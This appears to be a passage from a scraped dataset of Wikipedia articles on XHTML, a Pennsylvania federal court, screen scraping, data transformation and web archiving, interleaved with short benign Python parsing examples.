376 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/XHTML | Extensible HyperText Markup Language (XHTML) is part of the family of XML markup languages which mirrors or extends versions of the widely used HyperText Markup Language (HTML), the language in which Web pages are formulated. 1 While HTML, prior to HTML5, was defined as an application of Standard Generalized Markup Language (SGML), a flexible markup language framework, XHTML is an application of XML, a more restrictive subset of SGML. XHTML documents are well-formed and may therefore be parsed using standard XML parsers, unlike HTML, which requires a lenient HTML-specific parser. 2 XHTML 1.0 became a World Wide Web Consortium (W3C) recommendation on 26 January 2000. XHTML 1.1 became a W3C recommendation on 31 May 2001. XHTML is now referred to as "the XML syntax for HTML" 3 4 and being developed as an XML adaptation of the HTML living standard. 5 6 XHTML 1.0 was "a reformulation of the three HTML 4 document types as applications of XML 1.0". 7 The World Wide Web Consortium (W3C) also simultaneously maintained the HTML 4.01 Recommendation. In the XHTML 1.0 Recommendation document, as published and revised in August 2002, the W3C commented that "The XHTML family is the next step in the evolution of the Internet. By migrating to XHTML today, content developers can enter the XML world with all of its attendant benefits, while still remaining confident in their content's backward and future compatibility. 7 However, in 2005, the Web Hypertext Application Technology Working Group (WHATWG) formed, independently of the W3C, to work on advancing ordinary HTML not based on XHTML. The WHATWG eventually began working on a standard that supported both XML and non-XML serializations, HTML5, in parallel to W3C standards such as XHTML 2.0. In 2007, the W3C's HTML working group voted to officially recognize HTML5 and work on it as the next-generation HTML standard. 8 In 2009, the W3C allowed the XHTML 2.0 Working Group's charter to expire, acknowledging that HTML5 would be the sole next-generation HTML standard, including both XML and non-XML serializations. 9 Of the two serializations, the W3C suggests that most authors use the HTML syntax, rather than the XHTML syntax. 10 The W3C recommendations of both XHTML 1.0 and XHTML 1.1 were retired on 27 March 2018, 11 12 along with HTML 4.0, 13 HTML 4.01, 14 and HTML5. 15 XHTML was developed to make HTML more extensible and increase interoperability with other data formats. 16 In addition, browsers were forgiving of errors in HTML, and most websites were displayed despite technical errors in the markup; XHTML introduced stricter error handling. 17 HTML 4 was ostensibly an application of Standard Generalized Markup Language (SGML); however the specification for SGML was complex, and neither web browsers nor the HTML 4 Recommendation were fully conformant to it. 18 The XML standard, approved in 1998, provided a simpler data format closer in simplicity to HTML 4. 19 By shifting to an XML format, it was hoped HTML would become compatible with common XML tools; 20 servers and proxies would be able to transform content, as necessary, for constrained devices such as mobile phones. 21 By using namespaces, XHTML documents could provide extensibility by including fragments from other XML-based languages such as Scalable Vector Graphics and MathML. 
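The row above points out that XHTML is well-formed XML and can be read by a standard XML parser, while ordinary HTML needs a lenient, error-tolerant parser. A short sketch contrasting the two with the standard library's xml.etree.ElementTree and the BeautifulSoup/html5lib combination installed at the top of this notebook; both markup snippets are toy examples.
import xml.etree.ElementTree as ET
from bs4 import BeautifulSoup

xhtml_doc = '<html xmlns="http://www.w3.org/1999/xhtml"><body><p>Well-formed<br /></p></body></html>'
sloppy_html = "<html><body><p>Unclosed tag<br></body></html>"

# Strict XML parsing works on the well-formed XHTML document...
root = ET.fromstring(xhtml_doc)
print(root.tag)  # '{http://www.w3.org/1999/xhtml}html' -- note the namespace

# ...but rejects tag-soup HTML outright
try:
    ET.fromstring(sloppy_html)
except ET.ParseError as err:
    print("strict parser rejected it:", err)

# A lenient HTML parser repairs the same markup instead of rejecting it
print(BeautifulSoup(sloppy_html, "html5lib").p.get_text())  # 'Unclosed tag'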
22 Finally, the renewed work would provide an opportunity to divide HTML into reusable components (XHTML Modularization) and clean up untidy parts of the language. 23 There are various differences between XHTML and HTML. The Document Object Model (DOM) is a tree structure that represents the page internally in applications, and XHTML and HTML are two different ways of representing that in markup. Both are less expressive than the DOM for example, may be placed in comments in the DOM, but cannot be represented in a comment in either XHTML or HTML and generally, XHTML's XML syntax is more expressive than HTML (for example, arbitrary namespaces are not allowed in HTML). XHTML uses an XML syntax, while HTML uses a pseudo-SGML syntax (officially SGML for HTML 4 and under, but never in practice, and standardized away from SGML in HTML5). Because the expressible contents of the DOM in syntax are slightly different, there are some changes in actual behavior between the two models. Syntax differences, however, can be overcome by implementing an alternate translational framework within the markup. First, there are some differences in syntax: 24 In addition to the syntactical differences, there are some behavioral differences, mostly arising from the underlying differences in serialization. For example: The similarities between HTML 4.01 and XHTML 1.0 led many websites and content management systems to adopt the initial W3C XHTML 1.0 Recommendation. To aid authors in the transition, the W3C provided guidance on how to publish XHTML 1.0 documents in an HTML-compatible manner, and serve them to browsers that were not designed for XHTML. 28 29 Such "HTML-compatible" content is sent using the HTML media type (text html) rather than the official Internet media type for XHTML (application xhtml xml). When measuring the adoption of XHTML to that of regular HTML, therefore, it is important to distinguish whether it is media type usage or actual document contents that are being compared. 30 31 Most web browsers have mature support 32 for all of the possible XHTML media types. 33 The notable exception is Internet Explorer versions 8 and earlier by Microsoft; rather than rendering application xhtml xml content, a dialog box invites the user to save the content to disk instead. Both Internet Explorer 7 (released in 2006) and Internet Explorer 8 (released in March 2009) exhibit this behavior. 34 Microsoft developer Chris Wilson explained in 2005 that IE7's priorities were improved browser security and CSS support, and that proper XHTML support would be difficult to graft onto IE's compatibility-oriented HTML parser; 35 however, Microsoft added support for true XHTML in IE9. 36 As long as support is not widespread, most web developers avoid using XHTML that is not HTML-compatible, 37 so advantages of XML such as namespaces, faster parsing, and smaller-footprint browsers do not benefit the user. 38 39 40 In the early 2000s, some Web developers began to question why Web authors ever made the leap into authoring in XHTML. 41 42 43 Others countered that the problems ascribed to the use of XHTML could mostly be attributed to two main sources: the production of invalid XHTML documents by some Web authors and the lack of support for XHTML built into Internet Explorer 6. 44 45 They went on to describe the benefits of XML-based Web documents (i.e. XHTML) regarding searching, indexing, and parsing as well as future-proofing the Web itself. 
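Because, as noted above, XHTML content may reach a client either as text html or as application xhtml xml, a scraper can inspect the Content-Type header before choosing a parser. A rough sketch with requests; the URL is a placeholder and the header handling is simplified (charset parameters are just stripped off).
import requests
import xml.etree.ElementTree as ET
from bs4 import BeautifulSoup

def parse_by_media_type(url: str):
    """Use a strict XML parse for application/xhtml+xml, a lenient one otherwise."""
    resp = requests.get(url, timeout=10)
    media_type = resp.headers.get("Content-Type", "").split(";")[0].strip().lower()
    if media_type == "application/xhtml+xml":
        return media_type, ET.fromstring(resp.content)        # strict: must be well-formed
    return media_type, BeautifulSoup(resp.text, "html5lib")   # lenient: tag soup tolerated

# Hypothetical usage:
# media_type, tree = parse_by_media_type("https://example.org/page.xhtml")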
In October 2006, HTML inventor and W3C chair Tim Berners-Lee, introducing a major W3C effort to develop a new HTML specification, posted in his blog that t he attempt to get the world to switch to XML ... all at once didn't work. The large HTML-generating public did not move ... Some large communities did shift and are enjoying the fruits of well-formed systems ... The plan is to charter a completely new HTML group. 46 The current HTML5 working draft says "special attention has been given to defining clear conformance criteria for user agents in an effort to improve interoperability ... while at the same time updating the HTML specifications to address issues raised in the past few years. Ian Hickson, editor of the HTML5 specification criticizing the improper use of XHTML in 2002, 41 is a member of the group developing this specification and is listed as one of the co-editors of the current working draft. 47 Simon Pieters researched the XML-compliance of mobile browsers 48 and concluded "the claim that XHTML would be needed for mobile devices is simply a myth". December 1998 saw the publication of a W3C Working Draft entitled Reformulating HTML in XML. This introduced Voyager, the codename for a new markup language based on HTML 4, but adhering to the stricter syntax rules of XML. By February 1999 the name of the specification had changed to XHTML 1.0: The Extensible HyperText Markup Language, and in January 2000 it was officially adopted as a W3C Recommendation. 49 There are three formal Document Type Definitions (DTD) for XHTML 1.0, corresponding to the three different versions of HTML 4.01: The second edition of XHTML 1.0 became a W3C Recommendation in August 2002. 50 Modularization provides an abstract collection of components through which XHTML can be subsetted and extended. The feature is intended to help XHTML extend its reach onto emerging platforms, such as mobile devices and Web-enabled televisions. The initial draft of Modularization of XHTML became available in April 1999, and reached Recommendation status in April 2001. 51 The first modular XHTML variants were XHTML 1.1 and XHTML Basic 1.0. In October 2008 Modularization of XHTML was superseded by XHTML Modularization 1.1, which adds an XML Schema implementation. It was superseded by a second edition in July 2010. 52 XHTML 1.1 evolved out of the work surrounding the initial Modularization of XHTML specification. The W3C released the first draft in September 1999; the Recommendation status was reached in May 2001. 53 The modules combined within XHTML 1.1 effectively recreate XHTML 1.0 Strict, with the addition of ruby annotation elements (ruby, rbc, rtc, rb, rt and rp) to better support East-Asian languages. Other changes include the removal of the name attribute from the a and map elements, and (in the first edition of the language) the removal of the lang attribute in favor of xml:lang. Although XHTML 1.1 is largely compatible with XHTML 1.0 and HTML 4, in August 2002 the Working Group issued a formal Note advising that it should not be transmitted with the HTML media type. 54 With limited browser support for the alternate application xhtml xml media type, XHTML 1.1 proved unable to gain widespread use. In January 2009 a second edition of the document (XHTML Media Types Second Edition) was issued, relaxing this restriction and allowing XHTML 1.1 to be served as text html. 
55 The second edition of XHTML 1.1 was issued on 23 November 2010, which addresses various errata and adds an XML Schema implementation not included in the original specification. 56 (It was first released briefly on 7 May 2009 as a "Proposed Edited Recommendation" 57 before being rescinded on 19 May due to unresolved issues.) Since information appliances may lack the system resources to implement all XHTML abstract modules, the W3C defined a feature-limited XHTML specification called XHTML Basic. It provides a minimal feature subset sufficient for the most common content-authoring. The specification became a W3C recommendation in December 2000. 58 Of all the versions of XHTML, XHTML Basic 1.0 provides the fewest features. With XHTML 1.1, it is one of the two first implementations of modular XHTML. In addition to the Core Modules (Structure, Text, Hypertext, and List), it implements the following abstract modules: Base, Basic Forms, Basic Tables, Image, Link, Metainformation, Object, Style Sheet, and Target. 59 60 XHTML Basic 1.1 replaces the Basic Forms Module with the Forms Module and adds the Intrinsic Events, Presentation, and Scripting modules. It also supports additional tags and attributes from other modules. This version became a W3C recommendation on 29 July 2008. 61 The current version of XHTML Basic is 1.1 Second Edition (23 November 2010), in which the language is re-implemented in the W3C's XML Schema language. This version also supports the lang attribute. 62 XHTML-Print, which became a W3C Recommendation in September 2006, is a specialized version of XHTML Basic designed for documents printed from information appliances to low-end printers. 63 XHTML Mobile Profile (abbreviated XHTML MP or XHTML-MP) is a third-party variant of the W3C's XHTML Basic specification. Like XHTML Basic, XHTML was developed for information appliances with limited system resources. In October 2001, a limited company called the Wireless Application Protocol Forum began adapting XHTML Basic for WAP 2.0, the second major version of the Wireless Application Protocol. WAP Forum based their DTD on the W3C's Modularization of XHTML, incorporating the same modules the W3C used in XHTML Basic 1.0—except for the Target Module. Starting with this foundation, the WAP Forum replaced the Basic Forms Module with a partial implementation of the Forms Module, added partial support for the Legacy and Presentation modules, and added full support for the Style Attribute Module. In 2002, the WAP Forum has subsumed into the Open Mobile Alliance (OMA), which continued to develop XHTML Mobile Profile as a component of their OMA Browsing Specification. To this version, finalized in 2004, the OMA added partial support for the Scripting Module and partial support for Intrinsic Events. XHTML MP 1.1 is part of v2.1 of the OMA Browsing Specification (1 November 2002). 64 This version, finalized on 27 February 2007, expands the capabilities of XHTML MP 1.1 with full support for the Forms Module and OMA Text Input Modes. XHTML MP 1.2 is part of v2.3 of the OMA Browsing Specification (13 March 2007). 64 XHTML MP 1.3 (finalized on 23 September 2008) uses the XHTML Basic 1.1 document type definition, which includes the Target Module. Events in this version of the specification are updated to DOM Level 3 specifications (i.e., they are platform- and language-neutral). The XHTML 2 Working Group considered the creation of a new language based on XHTML 1.1. 
65 If XHTML 1.2 was created, it would include WAI-ARIA and role attributes to better support accessible web applications, and improved Semantic Web support through RDFa. The inputmode attribute from XHTML Basic 1.1, along with the target attribute (for specifying frame targets) might also be present. The XHTML2 WG had not been chartered to carry out the development of XHTML1.2. Since the W3C announced that it does not intend to recharter the XHTML2 WG, 9 and closed the WG in December 2010, this means that XHTML 1.2 proposal would not eventuate. Between August 2002 and July 2006, the W3C released eight Working Drafts of XHTML 2.0, a new version of XHTML able to make a clean break from the past by discarding the requirement of backward compatibility. This lack of compatibility with XHTML 1.x and HTML 4 caused some early controversy in the web developer community. 66 Some parts of the language (such as the role and RDFa attributes) were subsequently split out of the specification and worked on as separate modules, partially to help make the transition from XHTML 1.x to XHTML 2.0 smoother. The ninth draft of XHTML 2.0 was expected to appear in 2009, but on 2 July 2009, the W3C decided to let the XHTML2 Working Group charter expire by that year's end, effectively halting any further development of the draft into a standard. 9 Instead, XHTML 2.0 and its related documents were released as W3C Notes in 2010. 67 68 New features to have been introduced by XHTML 2.0 included: HTML5 grew independently of the W3C, through a loose group of browser manufacturers and other interested parties calling themselves the WHATWG, or Web Hypertext Application Technology Working Group. The key motive of the group was to create a platform for dynamic web applications; they considered XHTML 2.0 to be too document-centric, and not suitable for the creation of internet forum sites or online shops. 69 HTML5 has both a regular text html serialization and an XML serialization, which is also known as XHTML5. 70 The language is more compatible with HTML 4 and XHTML 1.x than XHTML 2.0, due to the decision to keep the existing HTML form elements and events model. It adds many new elements not found in XHTML 1.x, however, such as section and aside tags. The XHTML5 language, like HTML5, uses a DOCTYPE declaration without a DTD. Furthermore, the specification deprecates earlier XHTML DTDs by asking the browsers to replace them with one containing only entity definitions for named characters during parsing. 70 XHTML RDFa is an extended version of the XHTML markup language for supporting RDF through a collection of attributes and processing rules in the form of well-formed XML documents. This host language is one of the techniques used to develop Semantic Web content by embedding rich semantic markup. An XHTML document that conforms to an XHTML specification is said to be valid. Validity assures consistency in document code, which in turn eases processing, but does not necessarily ensure consistent rendering by browsers. A document can be checked for validity with the W3C Markup Validation Service (for XHTML5, the Validator. nu Living Validator should be used instead). In practice, many web development programs provide code validation based on the W3C standards. The root element of an XHTML document must be html, and must contain an xmlns attribute to associate it with the XHTML namespace. The namespace URI for XHTML is http: www.w3.org 1999 xhtml. 
The example tag below additionally features an xml:lang attribute to identify the document with a natural language: In order to validate an XHTML document, a Document Type Declaration, or DOCTYPE, may be used. A DOCTYPE declares to the browser the Document Type Definition (DTD) to which the document conforms. A Document Type Declaration should be placed before the root element. The system identifier part of the DOCTYPE, which in these examples is the URL that begins with http: , need only point to a copy of the DTD to use, if the validator cannot locate one based on the public identifier (the other quoted string). It does not need to be the specific URL that is in these examples; in fact, authors are encouraged to use local copies of the DTD files when possible. The public identifier, however, must be character-for-character the same as in the examples. A character encoding may be specified at the beginning of an XHTML document in the XML declaration when the document is served using the application xhtml xml MIME type. (If an XML document lacks encoding specification, an XML parser assumes that the encoding is UTF 8 or UTF 16, unless the encoding has already been determined by a higher protocol.) For example: The declaration may be optionally omitted because it declares its encoding the default encoding. However, if the document instead makes use of XML 1.1 or another character encoding, a declaration is necessary. Internet Explorer prior to version 7 enters quirks mode, if it encounters an XML declaration in a document served as text html. XHTML 1.x documents are mostly backward compatible with HTML 4 user agents when the appropriate guidelines are followed. XHTML 1.1 is essentially compatible, although the elements for ruby annotation are not part of the HTML 4 specification and thus generally ignored by HTML 4 browsers. Later XHTML 1.x modules such as those for the role attribute, RDFa, and WAI-ARIA degrade gracefully in a similar manner. XHTML 2.0 is significantly less compatible, although this can be mitigated to some degree through the use of scripting. (This can be simple one-liners, such as the use of document.createElement() to register a new HTML element within Internet Explorer, or complete JavaScript frameworks, such as the FormFaces implementation of XForms.) The following are examples of XHTML 1.0 Strict, with both having the same visual output. The former one follows the HTML Compatibility Guidelines of the XHTML Media Types Note while the latter one breaks backward compatibility, but provides cleaner markup. 55 Example 1. Example 2. Notes: HTML5 and XHTML5 serializations are largely inter-compatible if adhering to the stricter XHTML5 syntax, but there are some cases in which XHTML will not work as valid HTML5 (e.g., processing instructions are deprecated in HTML clarify , are treated as comments, and close on the first , whereas they are fully allowed in XML, are treated as their own type, and close on ? ). 71 |
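A short, hedged Python sketch of the practical point the XHTML entry above makes: because XHTML documents are well-formed XML, they can be parsed with a standard XML parser, while ordinary "tag soup" HTML generally needs a lenient parser such as BeautifulSoup with html5lib (both installed earlier in this notebook). The namespace URI http://www.w3.org/1999/xhtml comes from the article; the sample markup and variable names are illustrative assumptions, not anything taken from the scraped page.

import xml.etree.ElementTree as ET
from bs4 import BeautifulSoup

XHTML_NS = "http://www.w3.org/1999/xhtml"  # the XHTML namespace URI named in the article

xhtml_doc = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">'
    '<head><title>Example</title></head>'
    '<body><p>Well-formed XHTML parses with a standard XML parser.</p></body>'
    '</html>'
)

# Strict XML parse succeeds because the document is well formed.
root = ET.fromstring(xhtml_doc)
title = root.find(f"{{{XHTML_NS}}}head/{{{XHTML_NS}}}title")
print("XML parser found title:", title.text)

# Tag-soup HTML is rejected by the strict parser but recovered by a lenient HTML parser.
sloppy_html = "<html><body><p>Unclosed tags are fine in HTML<p>but not in XML</body></html>"
try:
    ET.fromstring(sloppy_html)
except ET.ParseError as err:
    print("Strict XML parser rejected the HTML:", err)

soup = BeautifulSoup(sloppy_html, "html5lib")
print("Lenient parser recovered paragraphs:", [p.get_text() for p in soup.find_all("p")])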
377 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/United_States_District_Court_for_the_Eastern_District_of_Pennsylvania | The United States District Court for the Eastern District of Pennsylvania (in case citations, E.D. Pa.) is one of the original 13 federal judiciary districts created by the Judiciary Act of 1789. It originally sat in Independence Hall in Philadelphia as the United States District Court for the District of Pennsylvania, and is now located at the James Byrne Courthouse at 601 Market Street in Philadelphia. There are five Eastern District federal courtrooms in Pennsylvania: Philadelphia, Lancaster, Allentown, Reading, and Easton. The Court's jurisdiction includes nine counties in eastern Pennsylvania: Berks, Bucks, Chester, Delaware, Lancaster, Lehigh, Montgomery, Northampton, and Philadelphia counties. The district is a part of the Third Circuit, and appeals are taken to that Circuit, except for patent claims and claims against the U.S. government under the Tucker Act, which are appealed to the Federal Circuit. The chief judge for the Eastern Pennsylvania District Court is Mitchell S. Goldberg. The people in the district are represented by the United States attorney for the Eastern District of Pennsylvania. As of June 21, 2022 update , the U.S. attorney is Jacqueline C. Romero. 1 The United States District Court for the District of Pennsylvania was one of the original 13 courts established by the Judiciary Act of 1789, 1 Stat. 73, on September 24, 1789. 2 3 It was subdivided on April 20, 1818, by 3 Stat. 462, 2 3 into the Eastern and Western Districts to be headquartered in Philadelphia and Pittsburgh, respectively. 2 Portions of these districts were subsequently subdivided into the Middle District on March 2, 1901, by 31 Stat. 880. 3 At the time of its initial subdivision, presiding judge Richard Peters Jr. was reassigned to only the Eastern District. As of May 17, 2024 update : Chief judges have administrative responsibilities with respect to their district court. Unlike the Supreme Court, where one justice is specifically nominated to be chief, the office of chief judge rotates among the district court judges. To be chief, a judge must have been in active service on the court for at least one year, be under the age of 65, and have not previously served as chief judge. A vacancy is filled by the judge highest in seniority among the group of qualified judges. The chief judge serves for a term of seven years, or until age 70, whichever occurs first. The age restrictions are waived if no members of the court would otherwise be qualified for the position. When the office was created in 1948, the chief judge was the longest-serving judge who had not elected to retire, on what has since 1958 been known as senior status, or declined to serve as chief judge. After August 6, 1959, judges could not become or remain chief after turning 70 years old. The current rules have been in operation since October 1, 1982. |
379 | https://en.wikipedia.org/wiki/Data_scraping | https://no.wikipedia.org/wiki/Skjermskraping | Skjermskraping (from the English "screen scraping") means copying text and media elements from external sources in order to extract useful information. The most common form is the scraping of web pages. Screen scraping is often used to combine information from different websites, and compensates for the fact that the sites being combined have not published their information in structured text formats that would make such linking straightforward. |
380 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_transformation | In computing, data transformation is the process of converting data from one format or structure into another format or structure. It is a fundamental aspect of most data integration 1 and data management tasks such as data wrangling, data warehousing, data integration and application integration. Data transformation can be simple or complex based on the required changes to the data between the source (initial) data and the target (final) data. Data transformation is typically performed via a mixture of manual and automated steps. 2 Tools and technologies used for data transformation can vary widely based on the format, structure, complexity, and volume of the data being transformed. A master data recast is another form of data transformation where the entire database of data values is transformed or recast without extracting the data from the database. All data in a well designed database is directly or indirectly related to a limited set of master database tables by a network of foreign key constraints. Each foreign key constraint is dependent upon a unique database index from the parent database table. Therefore, when the proper master database table is recast with a different unique index, the directly and indirectly related data are also recast or restated. The directly and indirectly related data may also still be viewed in the original form since the original unique index still exists with the master data. Also, the database recast must be done in such a way as to not impact the applications architecture software. When the data mapping is indirect via a mediating data model, the process is also called data mediation. Data transformation can be divided into the following steps, each applicable as needed based on the complexity of the transformation required. These steps are often the focus of developers or technical data analysts who may use multiple specialized tools to perform their tasks. The steps can be described as follows: Data discovery is the first step in the data transformation process. Typically the data is profiled using profiling tools or sometimes using manually written profiling scripts to better understand the structure and characteristics of the data and decide how it needs to be transformed. Data mapping is the process of defining how individual fields are mapped, modified, joined, filtered, aggregated etc. to produce the final desired output. Developers or technical data analysts traditionally perform data mapping since they work in the specific technologies to define the transformation rules (e.g. visual ETL tools, 3 transformation languages). Code generation is the process of generating executable code (e.g. SQL, Python, R, or other executable instructions) that will transform the data based on the desired and defined data mapping rules. 4 Typically, the data transformation technologies generate this code 5 based on the definitions or metadata defined by the developers. Code execution is the step whereby the generated code is executed against the data to create the desired output. The executed code may be tightly integrated into the transformation tool, or it may require separate steps by the developer to manually execute the generated code. Data review is the final step in the process, which focuses on ensuring the output data meets the transformation requirements. It is typically the business user or final end-user of the data that performs this step. 
Any anomalies or errors in the data that are found and communicated back to the developer or data analyst as new requirements to be implemented in the transformation process. 1 Traditionally, data transformation has been a bulk or batch process, 6 whereby developers write code or implement transformation rules in a data integration tool, and then execute that code or those rules on large volumes of data. 7 This process can follow the linear set of steps as described in the data transformation process above. Batch data transformation is the cornerstone of virtually all data integration technologies such as data warehousing, data migration and application integration. 1 When data must be transformed and delivered with low latency, the term "microbatch" is often used. 6 This refers to small batches of data (e.g. a small number of rows or small set of data objects) that can be processed very quickly and delivered to the target system when needed. Traditional data transformation processes have served companies well for decades. The various tools and technologies (data profiling, data visualization, data cleansing, data integration etc.) have matured and most (if not all) enterprises transform enormous volumes of data that feed internal and external applications, data warehouses and other data stores. 8 This traditional process also has limitations that hamper its overall efficiency and effectiveness. 1 2 7 The people who need to use the data (e.g. business users) do not play a direct role in the data transformation process. 9 Typically, users hand over the data transformation task to developers who have the necessary coding or technical skills to define the transformations and execute them on the data. 8 This process leaves the bulk of the work of defining the required transformations to the developer, which often in turn do not have the same domain knowledge as the business user. The developer interprets the business user requirements and implements the related code logic. This has the potential of introducing errors into the process (through misinterpreted requirements), and also increases the time to arrive at a solution. 9 10 This problem has given rise to the need for agility and self-service in data integration (i.e. empowering the user of the data and enabling them to transform the data themselves interactively). 7 10 There are companies that provide self-service data transformation tools. They are aiming to efficiently analyze, map and transform large volumes of data without the technical knowledge and process complexity that currently exists. While these companies use traditional batch transformation, their tools enable more interactivity for users through visual platforms and easily repeated scripts. 11 Still, there might be some compatibility issues (e.g. new data sources like IoT may not work correctly with older tools) and compliance limitations due to the difference in data governance, preparation and audit practices. 12 Interactive data transformation (IDT) 13 is an emerging capability that allows business analysts and business users the ability to directly interact with large datasets through a visual interface, 9 understand the characteristics of the data (via automated data profiling or visualization), and change or correct the data through simple interactions such as clicking or selecting certain elements of the data. 
2 Although interactive data transformation follows the same data integration process steps as batch data integration, the key difference is that the steps are not necessarily followed in a linear fashion and typically don't require significant technical skills for completion. 14 There are a number of companies that provide interactive data transformation tools, including Trifacta, Alteryx and Paxata. They are aiming to efficiently analyze, map and transform large volumes of data while at the same time abstracting away some of the technical complexity and processes which take place under the hood. Interactive data transformation solutions provide an integrated visual interface that combines the previously disparate steps of data analysis, data mapping and code generation execution and data inspection. 8 That is, if changes are made at one step (like for example renaming), the software automatically updates the preceding or following steps accordingly. Interfaces for interactive data transformation incorporate visualizations to show the user patterns and anomalies in the data so they can identify erroneous or outlying values. 9 Once they've finished transforming the data, the system can generate executable code logic, which can be executed or applied to subsequent similar data sets. By removing the developer from the process, interactive data transformation systems shorten the time needed to prepare and transform the data, eliminate costly errors in interpretation of user requirements and empower business users and analysts to control their data and interact with it as needed. 10 There are numerous languages available for performing data transformation. Many transformation languages require a grammar to be provided. In many cases, the grammar is structured using something closely resembling Backus Naur form (BNF). There are numerous languages available for such purposes varying in their accessibility (cost) and general usefulness. 15 Examples of such languages include: Additionally, companies such as Trifacta and Paxata have developed domain-specific transformational languages (DSL) for servicing and transforming datasets. The development of domain-specific languages has been linked to increased productivity and accessibility for non-technical users. 16 Trifacta's “Wrangle” is an example of such a domain specific language. 17 Another advantage of the recent domain-specific transformational languages trend is that a domain-specific transformational language can abstract the underlying execution of the logic defined in the domain-specific transformational language. They can also utilize that same logic in various processing engines, such as Spark, MapReduce, and Dataflow. In other words, with a domain-specific transformational language, the transformation language is not tied to the underlying engine. 17 Although transformational languages are typically best suited for transformation, something as simple as regular expressions can be used to achieve useful transformation. A text editor like vim, emacs or TextPad supports the use of regular expressions with arguments. This would allow all instances of a particular pattern to be replaced with another pattern using parts of the original pattern. 
For example: could both be transformed into a more compact form like: In other words, all instances of a function invocation of foo with three arguments, followed by a function invocation with two arguments would be replaced with a single function invocation using some or all of the original set of arguments. Another advantage to using regular expressions is that they will not fail the null transform test. That is, using your transformational language of choice, run a sample program through a transformation that doesn't perform any transformations. Many transformational languages will fail this test. |
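The closing part of the data-transformation entry above describes using regular expressions to collapse a three-argument invocation of a function followed by a two-argument invocation of the same function into a single call, but the article's own before/after snippets did not survive the scrape. The sketch below is a hypothetical reconstruction of that idea in Python (the function names, argument names, and exact pattern are assumptions), using the re module already imported in this notebook.

import re

source = """
foo(a, b, c);
foo(d, e);
bar(1, 2, 3);
bar(4, 5);
"""

# Match "name(x, y, z);" immediately followed on the next line by "name(u, v);"
# for the same function name (captured once and back-referenced with \1).
pattern = re.compile(
    r"(\w+)\(\s*(\w+),\s*(\w+),\s*(\w+)\s*\);\s*\n"  # three-argument invocation
    r"\1\(\s*(\w+),\s*(\w+)\s*\);"                   # two-argument invocation of the same function
)

# Replace each pair with a single invocation that reuses all five original arguments.
compact = pattern.sub(r"\1(\2, \3, \4, \5, \6);", source)
print(compact)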
382 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_archiving | Web archiving is the process of collecting, preserving and providing access to material from World Wide Web. The aim is to ensure that information is preserved in an archival format for research and the public. 1 Web archivists typically employ automated web crawlers for capturing the massive amount of information on the Web. The most widely known web archive service is the Wayback Machine, run by Internet Archive. The growing portion of human culture created and recorded on the web makes it inevitable that more and more libraries and archives will have to face the challenges of web archiving. 2 National libraries, national archives and various consortia of organizations are also involved in archiving culturally important Web content. Commercial web archiving software and services are also available to organizations who need to archive their own web content for corporate heritage, regulatory, or legal purposes. While curation and organization of the web has been prevalent since the mid- to late 1990s, one of the first large-scale web archiving project was the Internet Archive, a non-profit organization created by Brewster Kahle in 1996. 3 The Internet Archive released its own search engine for viewing archived web content, the Wayback Machine, in 2001. 3 As of 2018, the Internet Archive was home to 40 petabytes of data. 4 The Internet Archive also developed many of its own tools for collecting and storing its data, including PetaBox for storing the large amounts of data efficiently and safely, and Heritrix, a web crawler developed in conjunction with the Nordic national libraries. 3 Other projects launched around the same time included a web archiving project by the National Library of Canada, Australia's Pandora, Tasmanian web archives and Sweden's Kulturarw3. 5 6 From 2001 to 2010, failed verification the International Web Archiving Workshop (IWAW) provided a platform to share experiences and exchange ideas. 7 8 The International Internet Preservation Consortium (IIPC), established in 2003, has facilitated international collaboration in developing standards and open source tools for the creation of web archives. 9 The now-defunct Internet Memory Foundation was founded in 2004 and founded by the European Commission in order to archive the web in Europe. 3 This project developed and released many open source tools, such as "rich media capturing, temporal coherence analysis, spam assessment, and terminology evolution detection. 3 The data from the foundation is now housed by the Internet Archive, but not currently publicly accessible. 10 Despite the fact that there is no centralized responsibility for its preservation, web content is rapidly becoming the official record. For example, in 2017, the United States Department of Justice affirmed that the government treats the President's tweets as official statements. 11 Web archivists generally archive various types of web content including HTML web pages, style sheets, JavaScript, images, and video. They also archive metadata about the collected resources such as access time, MIME type, and content length. This metadata is useful in establishing authenticity and provenance of the archived collection. Transactional archiving is an event-driven approach, which collects the actual transactions which take place between a web server and a web browser. 
It is primarily used as a means of preserving evidence of the content which was actually viewed on a particular website, on a given date. This may be particularly important for organizations which need to comply with legal or regulatory requirements for disclosing and retaining information. 12 A transactional archiving system typically operates by intercepting every HTTP request to, and response from, the web server, filtering each response to eliminate duplicate content, and permanently storing the responses as bitstreams. Web archives which rely on web crawling as their primary means of collecting the Web are influenced by the difficulties of web crawling: However, it is important to note that a native format web archive, i.e., a fully browsable web archive, with working links, media, etc., is only really possible using crawler technology. The Web is so large that crawling a significant portion of it takes a large number of technical resources. Also, the Web is changing so fast that portions of a website may suffer modifications before a crawler has even finished crawling it. Some web servers are configured to return different pages to web archiver requests than they would in response to regular browser requests. This is typically done to fool search engines into directing more user traffic to a website, and is often done to avoid accountability, or to provide enhanced content only to those browsers that can display it. Not only must web archivists deal with the technical challenges of web archiving, they must also contend with intellectual property laws. Peter Lyman 13 states that "although the Web is popularly regarded as a public domain resource, it is copyrighted; thus, archivists have no legal right to copy the Web". However national libraries in some countries 14 have a legal right to copy portions of the web under an extension of a legal deposit. Some private non-profit web archives that are made publicly accessible like WebCite, the Internet Archive or the Internet Memory Foundation allow content owners to hide or remove archived content that they do not want the public to have access to. Other web archives are only accessible from certain locations or have regulated usage. WebCite cites a recent lawsuit against Google's caching, which Google won. 15 In 2017 the Financial Industry Regulatory Authority, Inc. (FINRA), a United States financial regulatory organization, released a notice stating all the business doing digital communications are required to keep a record. This includes website data, social media posts, and messages. 16 Some copyright laws may inhibit Web archiving. For instance, academic archiving by Sci-Hub falls outside the bounds of contemporary copyright law. The site provides enduring access to academic works including those that do not have an open access license and thereby contributes to the archival of scientific research which may otherwise be lost. 17 18 |
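The web-archiving entry above describes transactional archiving as intercepting each HTTP response, filtering out duplicate content, and permanently storing the responses as bitstreams with enough metadata to establish provenance. The sketch below is a simplified, client-side approximation of that idea using the requests library already imported in this notebook; a real transactional archive sits at the web server, and the web_archive directory and file layout here are assumptions made for illustration.

import hashlib
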